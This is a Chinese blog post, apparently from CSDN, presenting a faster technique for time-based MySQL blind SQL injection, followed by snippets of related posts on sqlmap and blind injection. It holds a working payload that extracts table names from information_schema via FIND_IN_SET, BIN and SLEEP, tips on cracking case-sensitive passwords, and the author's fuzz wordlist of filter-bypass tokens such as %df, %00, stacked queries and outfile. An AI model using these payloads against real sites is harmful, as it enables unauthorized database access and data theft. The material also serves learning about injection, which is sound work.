MySQL盲注中提升猜解效率的新方法

最新推荐文章于 2023-02-09 13:58:32 发布
最新推荐文章于 2023-02-09 13:58:32 发布
阅读量226 收藏 1
点赞数
分类专栏: mysql数据库 文章标签: mysql sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46250265/article/details/114174109
版权

正文

此方法比二分法、位推法等更好一点,
原文地址

查询请求代码示例:

AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f

,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,

$,%,^,&,*,(,),-,+,=,\,,.,,\’,~,`,\\,|,{,},[,],:,;, ,)),1,1) FROM in

formation_schema.tables LIMIT 1)=@a AND IF(@a!=”,@a,SLEEP(5));

解释

1为正,0则为假,SLEEP(5)延时为空(表示为末位)。

原理可以参考原文,方法优点在于请求次数更少,不足在于不能确定大小写(MySQL字符串比较不区分)、SLEEP()用时过长等 等 。

很多可以优化的地方,如猜用户名只需要a-z0-9就一般够用了,密码这种区分大小写的得用CHAR()才行,像这样

FIND_IN_SET(CHAR(MID(table_name,1,1)), ’97,98,99′)SLEEP(3)

太费时间,可以考虑利用runtime报错(如1/0,escape®ex…),还有第一位根本不用猜解,肯定恒为1等 等 ,要想利用这技术这些都得考虑进去,不过总的来说这方法还是很犀利的,很佩服。

使用建议

小白目前也只是在自己搭的环境中具体的测试过,比目前的二分法使用比较方便。
再说一下,在具体实际中的运用,我们可以在sleep的时间上做更多的限制。
在进行字符测试的时候没有必要一下全部跑完,可以采用二分法的思想,进行猜解。
当然在遇到有字符过滤的时候还是需要先进行一下模糊测试的。
在这里附上自己用的fuzz

and
AND
&&
or
OR
xor
||
between
binary
|
&
=
like
LIKE
>
<
(
)
')
('
()
'
"
`
@
!
/*
*/
-
+
-- 
--
--+
#
\
;
;show databases;#
;show databases;%23
.
^
,
*,1
select
SELECT
union
UNION
order
by
from
where
database
limit
offset
information
schema
table
column
count
concat
group_concat
id
regexp
substr
mid
left
ascii
sleep
join
right
updatexml
extractvalue
exp
EXP
insert
into
delete
update
alter
create
all
distinct
not
as
desc
asc
having
floor
char
;%00
geometrycollection
polygon
multipoint
multilinestring
linestring
multipolygon
handler
having
version()
database()
user()
@@datadir
@@basedir
@@version_compile_os
@@hostname
@@global.secure_file_priv
%0a
%0d
%09
%df
%20
%23
%27
%'
%1$
CREATE
END
reverse
group
if
case
drop
for
relike
rlike
like
in
else
ord
chat
hex
is
is not
outfile
bin
substring
like4h
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmap1.6.5版本
07-24
4. **的扫描技术**:版本可能引入了的扫描方法,比如多线程扫描、并发请求处理等,以提高测试效率。 5. **增强的用户体验**:可能改进了命令行界面,提供了更多的选项和参数,使用户能够更加精细地控制扫描...
SQL注入】盲注优化
尚未佩妥剑 转眼便江湖
12-20 959
SQL注入之盲注优化技术 典型时间型盲注示例代码: &amp;amp;amp;amp;amp;lt;?php header('content-type:text/html;charset=utf-8'); @$id=$_GET['id']; //传参 if(!isset($id)){ die('请传入GET方法id参数值'); } $mysqli=new mysqli(); ...
SQL盲注加速方法总结
最新发布
tpaer的博客
02-09 3286
SQL盲注加速方法二分法加速、.与运算加速、.二进制延时注入加速、dnslog OOB外带通信总结。
sqlmap 盲注速度提升技巧
火柴人的博客
06-07 2322
sqlmap 盲注速度提升技巧
mysql dnslog_渗透技巧:使用dnslog加快盲注速度 · C1imber’s Blog
weixin_34624426的博客
02-07 610
sql盲注分为基于bool的盲注和基于时间的盲注,大家都知道,盲注是在页面没有显示位并且没有报错信息的时候,通过构造payload使页面返回的内容不同或者是页面响应的时间不同从而去判断出数据库的数据,不管是bool盲注还是时间盲注,在进行判断的时候都需要一个字符一个字符的去判断,虽然二分法可以加快盲注的速度,但是还有一种更好的办法,那就是使用dnslog,具体过程如下图由上图可以看出要进行dns...
让你的SQL盲注快起来
neal1991的专栏
04-19 769
本文首发于 Freebuf 平台,https://www.freebuf.com/articles/web/231741.htmlSQL 注入是当前 Web 安全最常见的安全问题之一,...
sqlmap文手册-sql注入自动化测试工具
07-19
除了阅读文版的手册,结合sqli-labs这样的实验平台进行实践操作也是学习的有效方法。用户手册不仅介绍了工具的基本概念和技术原理,还提供了详细的使用教程和各种选项及开关的解释,配有实例帮助理解。 SQLMap...
sqlmap-1.4.5-29-gd5a2ffc.zip
06-01
6. **盲注支持**:即使目标网站没有返回完整的错误信息,SQLMap也能通过时间延迟或基于布尔的盲注方法检测到注入漏洞。 7. **多线程与并发**:SQLMap支持多线程和并发请求,加快测试速度,提高效率。 8. **自定义...
sqlmap.zip
10-31
4. **权限升级**:如果可能,SQLMap会尝试提升权限,比如获取数据库管理员权限,这样可以对数据库进行更广泛的控制,甚至影响到操作系统层面。 5. **数据篡改与删除**:攻击者还可以利用SQLMap修改或删除数据库的...
sqlmap sql注入
08-22
它支持多种数据库管理系统,如MySQL、Oracle、PostgreSQL、Microsoft SQL Server等。SQLMap的主要功能包括: 1. **自动检测**:SQLMap能够自动识别是否存在SQL注入漏洞,通过对输入参数进行各种测试,如时间延迟...
mysql sql 位运算 效率_基于时间的高效的SQL盲注-使用MySQL的位运算符
weixin_30003217的博客
01-27 595
在2011年至2012年期间针对MySQL数据库集成的各种PHP应用程序进行了一些渗透测试,发现这些数据库容易受到基于时间的SQL盲注攻击。由于各种阻碍和限制,处理起来有些许棘手,因此,不得不找到一种允许我尽可能少地检索数据的方法。我偶然发现了使用位移技术演示SQL注入的文章:https://www.exploit-db.com/papers/17073/在最近的CTF比赛Hack the Bo...
SQL注入可利用的函数,如database()、user(),@@datadir
m0_51756263的博客
07-10 2000
SQL注入可利用的函数,如database()、user()、@@datadir、version()、@@basedir、@@version_compile_os
mysql盲注ascii_[翻译]关于通过对8bit的ascii做右位移提高mysql盲注效率
weixin_42593130的博客
01-27 122
该楼层疑似违规已被系统折叠隐藏此楼查看此楼通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位下面将以查询mysql数据库user()的第一位为例:ps:第二位,第三位依次类推select substr(user(),2,1) mysql> select substr(user(),3,1)首先执行如下sql语句:mysql> select (ascii((su...
手工注入猜解过程详解
lizhengnanhua的专栏
09-23 4892
1.猜解表名: http://xxx.com/test.asp?id=123 and (select count(*) from admin)>=0//猜解是否有表admin 2.猜解字段名: http://xxx.com/test.asp?id=123 and (select count(adminname) from admin)>=0//admin表是否有字段adminname 3
SQL注入笔记03:盲注攻击
ONS_cukuyo的博客
09-14 701
  普通联合注入和盲注的区别 普通注入:效率高,兼容性差 盲注效率低,兼容性强 工具采用的基本都为盲注及其他注入 ********************************************************基于时间延迟的盲注攻击:******************************************************** sleep()        ...
mysql 盲注手动_学习笔记 MYSQL盲注
weixin_36248747的博客
02-02 211
猜解当前数据库名输入 1 ’ and length(database())=1 # ,显示不存在;输入 1 ’ and length(database())=2 # ,显示不存在;输入 1 ’ and length(database())=3 # ,显示不存在;输入 1 ’ and length(database())=4 # ,显示存在:采用二分法猜解数据库名输入 1’ and asci...
SQL注入学习——时间盲注详解 sqli-labs(Less 9)
未完成的歌~的博客
09-01 4423
Less-9 基于时间的双引号盲注
时间盲注(延迟注入)
热门推荐
qq_51954912的博客
04-25 1万+
时间盲注简介 时间盲注,个人理解,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。 官方理解:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。(除了看不懂,哪都好)。 利用sql-labs第九关进行实操演示
mysql路径猜解_MySQL盲注提升猜解效率方法
weixin_42166105的博客
02-02 59
方法比二分法、位推法等更好一点,查询请求示例:AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,”,\’,~,`,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

like4h

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值